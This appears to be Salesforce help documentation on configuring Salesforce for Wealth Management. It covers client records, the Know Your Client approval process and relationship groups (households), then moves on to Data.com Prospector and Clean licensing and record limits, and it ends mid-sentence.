CULTIVATING HIGH NET WORTH CUSTOMERS FOR FINANCIAL
SERVICES

Salesforce for Wealth Management Overview
What Is Salesforce for Wealth Management?

Salesforce for Wealth Management is an industry solution that is designed and customized for the wealth management industry.

Who Should Use Salesforce for Wealth Management?

Salesforce for Wealth Management is intended for wealth management professionals who advise high net worth clients. It
allows you to build deeper customer relationships, integrate key systems to drive user adoption, and effectively support
compliance processes.
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How Do I Obtain Salesforce for Wealth Management?

Salesforce for Wealth Management is available at an additional cost with Enterprise and Unlimited Editions. It includes all
generally available Enterprise and Unlimited Edition features such as Outlook integration, workflow, and the Force.com API.
As a prerequisite, it requires person accounts, which are enhanced account records designed for business-to-consumer industries
such as financial services.

To obtain Salesforce for Wealth Management, contact salesforce.com.

What Does Salesforce for Wealth Management Include?

Salesforce for Wealth Management contains the following components that set it apart from standard Salesforce functionality:

• Easy-to-use tabs with client-oriented fields
• Comprehensive client information including financial accounts, investment preferences, addresses, and personal interests
• Comprehensive “Know Your Client” suitability forms with an automated approval process
• Reports and dashboards specific to the wealth management process
• Relationship groups (also known as households)

See Also:
Getting Started With Salesforce for Wealth Management
Navigating the Salesforce for Wealth Management App

Getting Started With Salesforce for Wealth Management
User Permissions Needed

“View Setup and Configuration”To view the setup options for custom apps:

“Customize Application”To manage custom apps:

As an administrator, perform the following tasks to set up Salesforce for Wealth Management for your organization:

Verify the Contents of the Salesforce for Wealth Management App

Verify that the Salesforce for Wealth Management custom app contains the correct tabs:

1. From Setup, click Create > Apps.
2. In the list, click Salesforce for Wealth Management.
3. Verify that the following tabs are present in the Included Tabs list:

• Home
• Accounts
• Financial Accounts
• Holdings
• WM Assets
• Client Interests
• Know Your Clients
• Reports
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• Dashboards
• Documents
• Console

4. If necessary, click Edit and choose the appropriate tabs to add or remove.

Configure Users' App Choices

In addition to the main Salesforce for Wealth Management custom app, the following custom apps are also available in the
Force.com app menu:

• Salesforce Financial Accounts & Holdings
• Salesforce Clients and Interests
• Salesforce Know Your Client

Optionally, you can hide these apps from users in the Force.com app menu, because all appropriate tabs are already consolidated
in the main Salesforce for Wealth Management custom app. To hide these apps:

1. From Setup, click Create > Apps.
2. Click Edit next to the appropriate app name.
3. In the Assign to Profiles area, deselect the checkboxes in the Visible column that correspond to end users' profiles.

Select only the checkboxes that correspond to administrator profiles.
4. Click Save.
5. Repeat this procedure as necessary for the remaining custom apps listed above.

Verify Record Types

From Setup, click Customize > Accounts > Person Accounts > Record Types to verify that the following record types are
available for person accounts (clients):

Individual
This record type is for clients and prospective clients. It should be assigned to the Individual page layout.

Professional Relationship
This record type is for lawyers, accountants, and other professional relationships. It should be assigned to the
Professional Relationship page layout.

Configure Users' Page Layouts

Ensure that the following components are included in users' page layouts, which can be configured by clicking the appropriate
Page Layouts link from Setup, in Customize:

Home Tab Page Layouts
The home page layout for financial advisors, titled FA Home Page, should include the following components:
• Items To Approve
• Tasks
• Calendar
• Dashboard Snapshot
• Search
• Create New
• Recent Items
• Messages & Alerts
• Custom Links
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Person Accounts Page Layout
The page layouts for person accounts (clients) should include the following related lists:
• Financial Accounts
• Holdings
• Client Interests
• Know Your Client
• Open Activities
• Activity History
• Partners
• Account Team
• Notes & Attachments

Verifying the Know Your Client Approval Process

Salesforce for Wealth Management includes an approval process that routes Know Your Client forms to the appropriate
Salesforce users for approval.

See Also:
Salesforce for Wealth Management Overview
Managing Wealth Management Clients

Managing the Know Your Client Approval Process
User Permissions Needed

“Customize Application”To create, edit, delete, or clone approval processes:

“View Setup and Configuration”To view approval processes:

About the Know Your Client Approval Process

An approval process is an automated process your organization can use to approve records in Salesforce. An approval process
specifies the steps necessary for a record to be approved and who must approve it at each step. A step can apply to all records
included in the process, or just records that meet certain administrator-defined criteria. An approval process also specifies the
actions to take when a record is approved, rejected, recalled, or first submitted for approval.

The Know Your Client approval process is included in Salesforce for Wealth Management and has the following general
definition:

1. A financial advisor creates a new Know Your Client record.

Note:  Data from a saved Know Your Client record can be merged into a printable Microsoft Word document
using the provided mail merge template.

2. A financial advisor submits the Know Your Client record for approval, which sets the following actions in motion:

• The Know Your Client record is locked and cannot be edited
• KYC Approval Status becomes “Pending Approval”
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• Date Know Your Client Submitted becomes today
• Know Your Client record type becomes “KYC Submitted”
• An approval request is routed to the appropriate Salesforce user for review, and he or she is also sent an email notification

using the appropriate email template

3. The lead financial advisor approves or rejects the approval request, which causes the following actions:

• The record continues to be locked and cannot be edited
• KYC Approval Status becomes “Approved” or “Rejected”
• Date KYC Approved/Rejected becomes today
• If the record was approved, a follow-up task is scheduled for the financial advisor to review the Know Your Client form

in six months

Activating the Know Your Client Approval Process

To activate the Know Your client approval process:

1. From Setup, click Create > Workflow & Approvals > Approval Processes.
2. In the Manage Approval Processes For drop-down list, select “Know Your Client.”
3. Click Activate next to the approval process name.

See Also:
Salesforce for Wealth Management Overview
Managing Wealth Management Clients

Navigating the Salesforce for Wealth Management App
To access the Salesforce for Wealth Management app, go to the Force.com app menu in the top right corner of any Salesforce
page and select Salesforce for Wealth Management. To get started on any task, just click the tab you want.

See Also:
Salesforce for Wealth Management Overview
Managing Wealth Management Clients
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Managing Wealth Management Clients
User Permissions Needed

“Read” on accountsTo view the Clients tab:

“Read” on accountsTo view clients:

“Create” on accounts and contactsTo create clients:

Clients are exclusively available in Salesforce for Wealth Management. A client is a person who you advise or do business
with, a prospect who you potentially will do business with, or a professional relationship such as an accountant or lawyer. You
can manage your clients on the Clients tab. In standard Salesforce terminology, clients are called “accounts.” However, Salesforce
for Wealth Management uses the term “clients.”

Clients have all of the standard capabilities of account records.

In addition, the special capabilities of clients are as follows:

Client Record Types

Record types are categories that allow you to organize your records. You can assign client records to the following record
types:

• “Business” specifies a corporate entity or trust

• “Individual” specifies an existing or prospective client

• “Professional Relationship” specifies an accountant, lawyer, or other professional relationship

Client List Views

On the Clients tab, you can use list views to conveniently access different sets of clients. For example, select “My A
Clients” to view a list of your clients who have an “A” rating.

Client Details

The client detail page includes groups of fields tailored to wealth management clients. For example, one section tracks
a client's preferences in several categories — you can specify that a client is interested in vacation homes, mid-cap stocks,
the retail and entertainment sectors, golf, and US politics.

Financial Accounts Related List

The Financial Accounts related list provides an overview of the client's financial accounts, such as account names, account
numbers, and current values. This information comes from the records on the Financial Accounts tab.

Holdings Related List

The Holdings related list provides an overview of the client's owned assets such as funds, stocks, and bonds. For each
holding you can see values such as market value, last price, purchase price, and number of shares. This information comes
from the records on the Holdings tab. Note that each holding is associated with a financial account record.

Client Interests Related List

The Client Interests related list provides an overview of the securities that the client is interested in buying or selling.
This information comes from the records on the Client Interests tab.
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Know Your Clients Related List

The Know Your Clients related list provides an overview of the Know Your Client forms that are associated with the
client. This information comes from the records on the Know Your Clients tab.

Relationships Related List

A relationship refers to a client who has a role in the life of another client, such as a spouse, child, accountant, or attorney.
Relationships are tracked in the Relationships related list on the client detail page, which is available as an option. In
standard Salesforce terminology, relationships are called “partners.” However, Salesforce for Wealth Management uses
the term “relationships.”

Client Team Related List

The Client Team related list tracks the financial advisors and other Salesforce users who are involved in the management
of a particular client. In standard Salesforce terminology, client teams are called “account teams.” However, Salesforce
for Wealth Management uses the term “client teams.”

Relationship Group Members Related List

The Relationship Group Members related list displays the relationship groups of which the client is a member. It is
available as an option and is called “Household Members” in some organizations.

See Also:
Salesforce for Wealth Management Overview
Navigating the Salesforce for Wealth Management App

Salesforce for Wealth Management Reports and
Dashboards

User Permissions Needed

“Run Reports”

AND

“Read” on the records included in reports

To run reports:

“Run Reports”

AND

Access to view dashboard folders

To view dashboards:

Salesforce for Wealth Management Reports

Salesforce for Wealth Management offers industry-specific reports, which are grouped in the following folders on the Reports
tab:

• Client Reports
• Client Interest Reports
• Financial Account Reports
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• Holdings and WM Asset Reports
• Know Your Client Reports

To access these reports, select the appropriate folder from the drop-down list on the Reports tab, then click the appropriate
report name.

Salesforce for Wealth Management Dashboards

Salesforce for Wealth Management offers industry-specific dashboards, such as a dashboard of financial accounts that allows
you to analyze your book of business. To access these dashboards, go to the Dashboards tab and select the appropriate dashboard
name from the drop-down list.

Note:  You can see a dashboard snapshot on the Home tab.

See Also:
Salesforce for Wealth Management Overview
Navigating the Salesforce for Wealth Management App

ESTABLISHING RELATIONSHIP GROUPS OF YOUR CUSTOMERS

Relationship Groups Overview
Available in: Salesforce for Wealth Management

User Permissions Needed

“Create” and “Edit” on relationship groups

AND

“Create” and “Edit” on relationship group members

AND

“Read” on accounts

To create or edit relationship groups and relationship group
members via the wizard:

“Delete” on relationship groupsTo delete relationship groups:

“Delete” on relationship group membersTo remove relationship group members:

What Are Relationship Groups?

Relationship groups are custom object records used to store collections of accounts. For example, you can use relationship
groups to manage the following:
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• A household of people who reside at the same address
• An extended family consisting of multiple generations of relatives
• A professional group such as a medical practice or a law firm
• The trustees and beneficiaries of a trust

The accounts that you add to relationship groups are called relationship group members. For more information, see About
Relationship Group Members on page 837.

Who Can Use Relationship Groups?

Note:  Relationship groups are only available upon request to Salesforce for Wealth Management customers. Note
that the Relationship Groups tab may be named “Households” in Salesforce for Wealth Management organizations.
To enable relationship groups, contact your salesforce.com representative.

Your organization must have implemented person accounts before you can use relationship groups.

Your administrator can enable relationship groups by installing the Relationship Groups custom app.

What Are the Benefits of Relationship Groups?

Relationship groups allow you to:

• Track the familial and professional roles of different relationship group members
• Assign primary and secondary designations to the two most important members of a relationship group
• View roll-up related lists of all activities for the members of a relationship group
• View roll-up related lists of the custom objects that are related to the accounts in a relationship group

See Also:
Using Relationship Groups
Relationship Group Considerations

Relationship Group Fields

Available in: Salesforce for Wealth Management

A relationship group custom object has the following default fields, listed in alphabetical order.

DescriptionName

A text description of the relationship group. Up to 255
characters are allowed.

Description

The name of the primary relationship group member.Primary Name

The name of the secondary relationship group member.Secondary Name

The total number of members in the relationship group.Total Members
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To add custom fields to relationship groups, from Setup, click Develop > Objects > Relationship Group, then click New in
the Custom Fields & Relationships section.

See Also:
Relationship Groups Overview
Using Relationship Groups

About Relationship Group Members
Available in: Salesforce for Wealth Management

User Permissions Needed

“Create” and “Edit” on relationship groups

AND

“Create” and “Edit” on relationship group members

AND

“Read” on accounts

To create or edit relationship groups and relationship group
members via the wizard:

“Delete” on relationship groupsTo delete relationship groups:

“Delete” on relationship group membersTo remove relationship group members:

Note:  Relationship groups are only available upon request to Salesforce for Wealth Management customers. Note
that the Relationship Groups tab may be named “Households” in Salesforce for Wealth Management organizations.
To enable relationship groups, contact your salesforce.com representative.

What Are Relationship Group Members?

The accounts that you add to relationship groups are called relationship group members. Like relationship groups, relationship
group members are custom objects. Each relationship group member record represents an association between an account and
a relationship group. For example, if you add the account “Mary Smith” to the relationship group “Smith Family,” a relationship
group member record is created that links Mary Smith to the Smith Family.

Relationship group members are unique because they have two master-detail relationships: one with accounts and another
with relationship groups. When discussing these master-detail relationships, accounts and relationship groups are sometimes
referred to as the “parents” of relationship group members.

What Are the Limits on Relationship Group Members?

You can add a given account to up to 200 relationship groups. For example, an account “Joseph Brown” who is an attorney
may be a member of several relationship groups—in some cases as an attorney, in other cases as a family member.

You can add up to 20 accounts to a particular relationship group. For example, a relationship group that represents a large
extended family including grandparents, children, and grandchildren cannot have more than 20 relationship group members.
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In a particular relationship group, you can specify only one relationship group member as primary, and only one relationship
group member as secondary. In addition, you cannot add the same account more than once to a particular relationship group.

Where Can I View Relationship Group Members?

The Relationship Group Members related list displays on both the relationship group detail page and the account detail page.
On the relationship group detail page, the related list summarizes the accounts that are members of the given relationship
group. On the account detail page, the related list summarizes the relationship groups of which the given account is a member.

Relationship Group Member Fields

Relationship group members have the following fields.

DescriptionField Name

The name of the account.Account

The familial, professional, or other role that an account has
in a relationship group - for example, Client, Spouse, Child,

Role

Attorney, or Accountant. Your administrator defines the
available values in this picklist.

Designates an account as the most important member of the
relationship group. Only one relationship group member can
be specified as primary.

Primary

Designates an account as the second-most important member
of the relationship group. Only one relationship group member
can be specified as secondary.

Secondary

Specifies whether the activities and custom objects of an
account display in related lists on the relationship group detail
page.

Include in Roll-up

Does not display in the relationship group wizard, but is
available as a column in the Relationship Group Members

Priority

related list on account and relationship group detail pages.
This column displays the primary ( ) or secondary ( ) icon
as appropriate next to account names.

This is a system field that prevents duplicate records. It does
not display to users in Salesforce but is visible in the Force.com

Unique Key

API. This field should be treated as read only; attempts to
modify it through the API will be ignored.

Note: When you merge accounts, you also merge the accounts’ memberships in relationship groups.

See Also:
Relationship Groups Overview
Relationship Group Considerations
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Relationship Group Considerations
Available in: Salesforce for Wealth Management

To make the most of relationship groups and relationship group members, review the notable behaviors and limitations below.

Relationship Group Considerations

Relationship groups:

• Support roll-up related lists for activities and custom objects only.
• Are completely separate from the Partners related list on accounts.
• Do not have directly associated activities, notes, or attachments.
• Only support required custom fields that are configured with a default value. Such custom fields will display on relationship

group detail and edit pages, but not in the relationship groups wizard.
• Only support validation rules on custom fields that were added after the Relationship Group managed package was installed.
• Cannot be renamed to a different name than “relationship group,” because they are a custom object in a managed package.
• Can be created and edited through the relationship group wizard regardless of field-level security settings on the

Description field.

Relationship Group Member Considerations

Relationship group members:

• Are limited to a maximum of 20 per relationship group.
• Cannot be imported via the import wizard for custom objects.
• Do not support tagging.
• Have the division of the parent relationship group.
• Are owned by both the parent relationship group and the parent account.
• Do not support validation rules.
• Do not support universally required fields.
• Cannot be renamed to a different name than “relationship group member,” because they are a custom object in a managed

package.
• Can have the fields Primary, Secondary, and Include in Roll-Up edited through the relationship group wizard

even when the field-level security on those fields is “read-only.”
• Cannot be included in workflow rules or approval processes.
• Cannot be used in Salesforce to Salesforce.
• Are not supported in Connect Offline.
• Are only supported in API version 11.0 and later. In the API, using the upsert call on relationship group members is

not supported.

See Also:
Relationship Groups Overview
About Relationship Group Members
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Using Relationship Groups
Available in: Salesforce for Wealth Management

User Permissions Needed

“Create” and “Edit” on relationship groups

AND

“Create” and “Edit” on relationship group members

AND

“Read” on accounts

To create or edit relationship groups and relationship group
members via the wizard:

“Delete” on relationship groupsTo delete relationship groups:

“Delete” on relationship group membersTo remove relationship group members:

Note:  Relationship groups are only available upon request to Salesforce for Wealth Management customers. Note
that the Relationship Groups tab may be named “Households” in Salesforce for Wealth Management organizations.
To enable relationship groups, contact your salesforce.com representative.

You can perform the following actions with relationship groups:

• Creating Relationship Groups

• Add an account to the relationship group. To add an account, go to the account’s Relationship Group Members related
list, and click New.

• Editing the Members of Relationship Groups

• Displaying and Editing Relationship Groups

• Searching for Relationship Groups

• Deleting Relationship Groups

• Removing Members from Relationship Group Members

See Also:
Relationship Groups Overview
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Creating Relationship Groups
Available in: Salesforce for Wealth Management

User Permissions Needed

“Create” and “Edit” on relationship groups

AND

“Create” and “Edit” on relationship group members

AND

“Read” on accounts

To create or edit relationship groups and relationship group
members via the wizard:

“Delete” on relationship groupsTo delete relationship groups:

“Delete” on relationship group membersTo remove relationship group members:

Salesforce provides an easy wizard so you can quickly create and edit relationship groups. To create a new relationship group:

1. On the Relationship Groups home page, click New next to Recent Relationship Groups.
2. Enter the name and description of the relationship group:

a. Enter a name for the relationship group.
b. Optionally, enter a description for the relationship group.
c. Click Next to continue.

3. Define the members of the relationship group:

a. Use the lookup fields to select the appropriate records.
b. In the Role drop-down list, specify the appropriate role for each person in the relationship group.
c. Designate one of the records as primary.
d. Designate another record as secondary.
e. Optionally, click Add Member as needed to include additional members. You can add a maximum of 20 records to a

relationship group.
f. Select Include in Roll-up for the accounts whose related activities and custom objects should display on the

relationship group detail page.
g. Click Save to finish.

4. After completing the wizard, the detail page of the new relationship group displays so you can review your work.
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Note:  You can also add an account to a new or existing relationship group. To add an account, go to the Relationship
Group Members related list and click New.

See Also:
Relationship Groups Overview
About Relationship Group Members

Adding Accounts to Relationship Groups
Available in: Salesforce for Wealth Management

User Permissions Needed

“Create” and “Edit” on relationship groups

AND

“Create” and “Edit” on relationship group members

AND

“Read” on accounts

To create or edit relationship groups and relationship group
members via the wizard:

“Delete” on relationship groupsTo delete relationship groups:

“Delete” on relationship group membersTo remove relationship group members:

Salesforce provides an easy wizard so you can quickly create and edit relationship groups. On the Accounts tab, you can add
an account to a new or existing relationship group:

1. Open the detail page for the account you want to add to a relationship group.
2. On the Relationship Group Members related list, click New.
3. Choose whether to add the account to an existing relationship group or a new relationship group:

• If you are adding the account to an existing relationship group, click the lookup icon to find the appropriate relationship
group.

• If you are adding the account to a new relationship group, enter a name and optionally a description for the new
relationship group.

4. Click Next.
5. Define the members of the relationship group:

a. Use the lookup fields to select the appropriate records.
b. In the Role drop-down list, specify the appropriate role for each person in the relationship group.
c. Designate one of the records as primary.
d. Designate another record as secondary.
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e. Optionally, click Add Member as needed to include additional members. You can add a maximum of 20 records to a
relationship group.

f. Select Include in Roll-up for the accounts whose related activities and custom objects should display on the
relationship group detail page.

g. Click Save to finish.

6. After completing the wizard, the detail page of the new relationship group displays so you can review your work.

See Also:
Relationship Groups Overview

Editing the Members of Relationship Groups
Available in: Salesforce for Wealth Management

User Permissions Needed

“Create” and “Edit” on relationship groups

AND

“Create” and “Edit” on relationship group members

AND

“Read” on accounts

To create or edit relationship groups and relationship group
members via the wizard:

“Delete” on relationship groupsTo delete relationship groups:

“Delete” on relationship group membersTo remove relationship group members:

Salesforce provides an easy wizard so you can quickly create and edit relationship groups. To edit the members of a relationship
group:

1. Click New or Edit on the Relationship Group Members related list of a relationship group detail page. Alternatively, click
Edit next to a member listed on the Relationship Group Members list of an account detail page.

2. To remove an account from the relationship group, click [remove].
3. To add an account to the relationship group, enter an account name in an empty Account lookup field.
4. In the Role drop-down list, choose a role for each member of the relationship group.
5. In the Primary column, select a primary relationship group member.
6. In the Secondary column, select a secondary relationship group member.
7. Select Include in Roll-up for the accounts whose related activities and custom objects should display on the relationship

group detail page.
8. Optionally, click Add Member as needed to include additional members. You can add a maximum of 20 records to a

relationship group.
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9. Click Save to finish.

See Also:
Relationship Groups Overview
About Relationship Group Members

Displaying and Editing Relationship Groups
Available in: Salesforce for Wealth Management

User Permissions Needed

“Create” and “Edit” on relationship groups

AND

“Create” and “Edit” on relationship group members

AND

“Read” on accounts

To create or edit relationship groups and relationship group
members via the wizard:

“Delete” on relationship groupsTo delete relationship groups:

“Delete” on relationship group membersTo remove relationship group members:

Note:  Relationship groups are only available upon request to Salesforce for Wealth Management customers. Note
that the Relationship Groups tab may be named “Households” in Salesforce for Wealth Management organizations.
To enable relationship groups, contact your salesforce.com representative.

The following sections describe how to display and edit relationship groups:

• Accessing the Relationship Groups Tab

• Viewing Relationship Group Lists

• Displaying Relationship Group Records

• Editing Relationship Group Records

Accessing the Relationship Groups Tab

The Relationship Groups tab is available by default in the Relationship Groups app. To switch to the Relationship Groups
app, select Relationship Groups from the Force.com app menu in the top right corner of every Salesforce page.

Note that your administrator may have customized your profile to also display the Relationship Groups tab in other apps.

Viewing Relationship Group Lists

You can work with relationship group list views as you would any other custom object. .
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Displaying Relationship Group Records

To open an individual relationship group record, click a relationship group name on the relationship groups home page or a
relationship groups list view.

Note the following when viewing related lists on the relationship group detail page:

• The Relationship Group Members related list summarizes the accounts that are members of the relationship group. In
the Priority column, the icons (  and ) show which accounts are defined as primary or secondary for the relationship
group. For more information on relationship group members, see About Relationship Group Members on page 837.

• The Activity History and Open Activities related lists on a relationship group are roll-ups of activities for the relationship
group members; relationship groups themselves do not have their own tasks and events.

• If accounts have a relationship with a custom object, a related list for that custom object can display on the relationship
group detail page. This requires that Include in Roll-Up is selected on an associated relationship group member
record. For example, in the following theoretical scenario, the vehicles associated with members of the Stone family display
in a Vehicles related list on both the account detail page and the relationship group detail page:

◊ The account Sam Stone has a Toyota Prius car tracked in the Vehicles custom object related list on the account detail
page

◊ The account Chris Stone has a Ford Mustang car tracked in the same related list
◊ Sam and Chris Stone are members of the Stone Family relationship group
◊ Both associated relationship group member records have Include in Roll-Up selected

Editing Relationship Group Records

On the relationship group detail page, you can:

1. Click Edit to change the fields in the Relationship Group Detail section.
2. Click Delete to delete the relationship group. For more information, see Deleting Relationship Groups on page 846.
3. Click Clone to create a copy of the relationship group.
4. On the Relationship Group Members related list, click New to add an account to the relationship group. For more

information, see Editing the Members of Relationship Groups on page 843.
5. On the Activity History and Open Activities related lists, click the buttons such as New Task and Log a Call to add activity

records for a relationship group member. By default, the new activity records are associated with the primary account on
the relationship group.

See Also:
Relationship Group Fields
Relationship Groups Overview
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Searching for Relationship Groups
Available in: Salesforce for Wealth Management

User Permissions Needed

“Create” and “Edit” on relationship groups

AND

“Create” and “Edit” on relationship group members

AND

“Read” on accounts

To create or edit relationship groups and relationship group
members via the wizard:

“Delete” on relationship groupsTo delete relationship groups:

“Delete” on relationship group membersTo remove relationship group members:

1. Enter your search terms in the sidebar or header search box.
2. Click Search.
3. From the search results, click an item to open it or click Edit, if available.

Your administrator can customize the search layout for relationship groups to include the primary and secondary account
fields, so you can view and access those account records directly from relationship group search results.

See Also:
Relationship Groups Overview

Deleting Relationship Groups
Available in: Salesforce for Wealth Management

User Permissions Needed

“Delete” on relationship groupsTo delete a relationship group:

Relationship groups are custom object records that you can delete as you would any other record.

A relationship group is the master object in a master-detail relationship with relationship group members. Consequently,
when you delete a relationship group, all relationship group members on that relationship group are also deleted. Restoring a
relationship group from the Recycle Bin also restores the associated relationship group members that were deleted. However,
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if you delete a relationship group that contains the same relationship group member as a deleted account, the shared relationship
group member cannot be restored from the Recycle Bin.

See Also:
Removing Members from Relationship Group Members
Relationship Groups Overview

Removing Members from Relationship Group Members
Available in: Salesforce for Wealth Management

User Permissions Needed

“Delete” on relationship group membersTo remove a relationship group member:

To remove an individual relationship group member, go to the Relationship Group Members related list on an account or
relationship group detail page and click Del next to the appropriate relationship group member record.

Relationship group members are unique because they have two master-detail relationships: one with accounts and another
with relationship groups. Also, there are rules that govern the number of relationship group members a relationship group can
have, as well as prevent more than one relationship group member from being specified as either primary or secondary on a
given relationship group. The following considerations apply to deleting relationship group members:

Deleting Accounts with Relationship Group Members

When you delete an account, its associated relationship group members are also deleted. However, you cannot restore
an account from the Recycle Bin if restoring the account's deleted relationship group members would violate rules such
as the maximum of 20 relationship group members per relationship group. Also, if you delete an account that shares a
relationship group member with a deleted relationship group, the shared relationship group member is automatically
purged from the Recycle Bin.

Deleting Relationship Groups with Relationship Group Members

See Deleting Relationship Groups on page 846.

Restoring Individual Relationship Group Members

You cannot restore an individual relationship group member from the Recycle Bin in the following scenarios:
• Restoring the record would violate rules such as the maximum of 20 relationship group members per relationship

group
• The deleted relationship group member was deleted during an account merge

Relationship group members are automatically and irrecoverably removed from the Recycle Bin in the following scenarios:
• If both parents (the relationship group and the account) of a relationship group member are deleted, the relationship

group member is removed
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• If a relationship group member is deleted individually and then one of its parents is deleted, the relationship group
member is removed

See Also:
About Relationship Group Members
Deleting Relationship Groups

FINDING NEW ACCOUNTS, CONTACTS, AND LEADS WITH
DATA.COM

Data.com Product Suite Overview
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

Watch a Demo: Finding Data.com Accounts and Contacts and Adding Them to Salesforce (3:37 minutes)

Data.com is the Salesforce solution for delivering leading business data inside your CRM. Your team can spend less time
entering and updating data and more time growing your business.  Data.com combines crowd-sourced contacts with account
information from D&B, managed in the cloud, so you can keep your CRM clean and up to date in real time.

Within Salesforce, you can search for Data.com accounts and contacts directly on the Data.com tab, and if you have a Data.com
license, you can add records to Salesforce. You can add your contact search results as either contacts or leads. It’s easy to find
the accounts and contacts you need, and using Data.com is a great way to plan your sales territories, segment campaigns, find
new accounts to engage, and get new contacts to quickly expand your sales network. The Data.com product suite includes
Data.com Prospector and Data.com Clean, as well as these related Data.com features: Social Key, Reports, and Data
Assessments. Let’s learn about them and how they work together.

Data.com Prospector

All Salesforce users can search Data.com for accounts and contacts. Users with a Data.com Prospector license can:

• Add accounts and contacts to Salesforce, and add contacts as leads.
• Add contacts for an account directly from the account record.
• Export accounts and contacts from Data.com.
• Manually clean Salesforce account, contact, and lead records, regardless of whether they were added from Data.com.

There are two versions of Data.com Prospector: Corporate Prospector and Premium Prospector. They differ based on the
D&B fields that are included when you add or manually clean account or lead records.
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D&B FieldsData.com Prospector Version

Basic set of D&B fields.Data.com Corporate Prospector (known as Data.com
Corporate prior to Spring ’13)

Basic set of D&B fields, plus the D&B Company field. This
field links to an associated D&B Company record with over

Data.com Premium Prospector (known as Data.com Premium
prior to Spring ’13)

70 additional D&B fields that are accessible on the D&B
Companies tab.

Organizations that purchased Data.com prior to December 16, 2011 may still be using an earlier version of the product with
a limited set of fields. We’re retiring this version in Summer ’14. For information about upgrading to Data.com Prospector,
contact your Salesforce account manager. The Salesforce Help refers to the Data.com Prospector product unless otherwise
noted.

Data.com Clean

Data.com Clean is an important part of the Salesforce Data.com product suite, offering both manual and automated cleaning
for your account, contact, and lead records. Data.com Clean provides full clean capability for your organization: all Data.com
Clean users can manually clean Salesforce accounts, contacts, and leads, and you can configure jobs to flag field value differences
on Salesforce records or automatically fill blank fields. Data.com Clean does not support person accounts.

There are two versions of Data.com Clean: Corporate Clean and Premium Clean. They differ based on the D&B fields that
are available when you clean account or lead records, either manually or via automated jobs.

D&B FieldsData.com Clean Version

Basic set of D&B fields.Data.com Corporate Clean

Basic set of D&B fields, plus the D&B Company field. This
field links to an associated D&B Company record with over

Data.com Premium Clean

70 additional D&B fields that are accessible on the D&B
Companies tab. If the Salesforce records’s D&B Company field
is blank, a link will be created, if available, when the record is
cleaned.

Note:

• Prospector or Clean Corporate licences can not be purchased for organizations that already have Prospector or
Clean Premium licences. If you want to purchase Corporate licenses, you’ll need to convert your Premium licenses.

• Prospector or Clean Premium licences can not be purchased for organizations that already have Prospector or
Clean Corporate licences. If you want to purchase Premium licenses, you’ll need to convert your Corporate licenses.

• Data.com Clean must be purchased 1:1 for Sales Cloud and Service Cloud seats.

Data.com Social Key—Beta in Summer ’13

Data.com Social Key is a feature that works with Social Accounts and Contacts and Data.com Clean to make it easier to
follow your contacts and leads on social networks. Social Key provides social handles for LinkedIn, Twitter, and Facebook for
contacts and leads in the United States.

From Social Accounts and Contacts, select the social networks you want. Automated Clean jobs provide the social handles.
Users can log in to a social network from a contact or lead’s detail page and view the associated profile right within Salesforce
or on the social network site.
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Data.com Clean must be enabled to use Social Key.

Data.com Data Assessments
How many of your organization's records can Data.com enrich with more and better data? Data.com Assessments can tell
you. It can also identify how many of your records have been marked as Inactive in Data.com, and if you request, how
many records in your Salesforce organization appear to be duplicates. Data assessments also list the fields on accounts, contacts,
and leads, and tell you how many are blank within your records and how many have different values from Data.com’s. (For
example, you may have 10 account records in which the Phone field value is blank, or five contacts in which the Account
Name field is blank.) You can use it to help you decide whether to purchase Data.com Clean. If you already use Clean, it can
help show you the value you’re getting.

Data.com Reports

Want to analyze the impact of Data.com data on your business? Use the free Data.com Reports AppExchange package. It
offers several preconfigured Data.com reports and two corresponding impact dashboards. Use these tools to find out how
many records are sourced from Data.com, who has added them and when, and how they contribute to your sales forecast and
revenue. To use Data.com Reports, your organization must enable have enabled Data.com Clean.

Important Notice to Jigsaw for Salesforce Users

We’re retiring and discontinuing support for Jigsaw for Salesforce in Summer ’14.  If your organization still uses Jigsaw for
Salesforce, you’ll need to migrate to the built-in Data.com product suite for your prospecting and cleaning needs. For information
on migration, contact your Salesforce account manager.

Important:  You should not attempt to migrate to any of the built-in Data.com products without having first purchased
them through your Salesforce account manager. If, for example, you attempt to enable Data.com Clean without
purchasing it, you’ll see a message: Your organization does not currently have the permission
to run Clean jobs.

See Also:
Data.com Clean Overview
Finding and Adding Account, Contact, and Lead Records From Data.com
How do I know which Data.com product my organization has?
What product should my organization use to clean our account, contact, and lead records?

Understanding Data.com User Types, Licenses, and Limits
Data.com Prospector license available in: Contact Manager (no Lead object), Group, Professional, Enterprise, and
Unlimited Editions

Data.com Clean license available in: Professional, Enterprise, and Unlimited Editions

The Data.com Licenses & Limits page identifies the type and number of Data.com Prospector user licenses you have, and
the limits per user and for your organization. Limits are listed by user type: Data.com User and Data.com List User. Assign
monthly record additions on the User Edit page for each user.

The Licenses & Limits page also provides information about your organization’s Clean implementation.
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Data.com Prospector Licenses

Data.com Prospector user licenses let users search Data.com for accounts and contacts, and add them as records to Salesforce.
Users can also add contacts as leads.

There are two versions of Data.com Prospector available: Corporate Prospector and Premium Prospector. They differ based
on the D&B fields that are included when you add account or lead records to Salesforce. Both versions of the product include
a basic set of D&B fields , including D-U-N-S Number, NAICS Code, and NAICS Description. Data.com Premium
Prospector also includes over 70 additional D&B fields on D&B Company records. (D&B Company records are linked to
accounts and leads that are added to Salesforce from Data.com.) To find out which Data.com Prospector product your
organization has, from Setup, click Data.com Administration > Licenses & Limits. On the Licenses & Limits page, check
the Data.com Licenses section. You’ll see either “Corporate” or “Premium.”

DefinitionField

The total number of Data.com Prospector user licenses your organization has purchased from Salesforce.Number of
Licenses

The number of Data.com Prospector user licenses you've assigned. A single Data.com Prospector license
is assigned every time you enable a user for Data.com Prospector.

Assigned

Tip:  To see which users have been enabled, check the All Data.com Users page. From Setup,
click Data.com Administration > Users.

Data.com User Limits (Monthly)
Data.com Users get a limited number of records to add or export per month, and their unused additions expire at the end of
each month. For each Data.com User, you can see the monthly limit and number of records added to Salesforce or exported
during the month. Only Data.com Users can draw from the organization’s monthly limit. If a Data.com List user wants to
draw from the monthly limit, you need to change that user to a Data.com User.

DefinitionField

The number of records a single Data.com User can add or export.

The default number of records per license is 300, but it can be adjusted based on your agreement.
Additions expire at the end of each month, as determined by your organization’s default time zone.

Default
Per-User
Record Limit

The total number of records your organization can add or export each month.

This limit is calculated by multiplying the number of Data.com Prospector licenses you have by the
monthly limit per user license.

Organization
Limit

Typically, you distribute record limits among a number of users within your organization, but you can
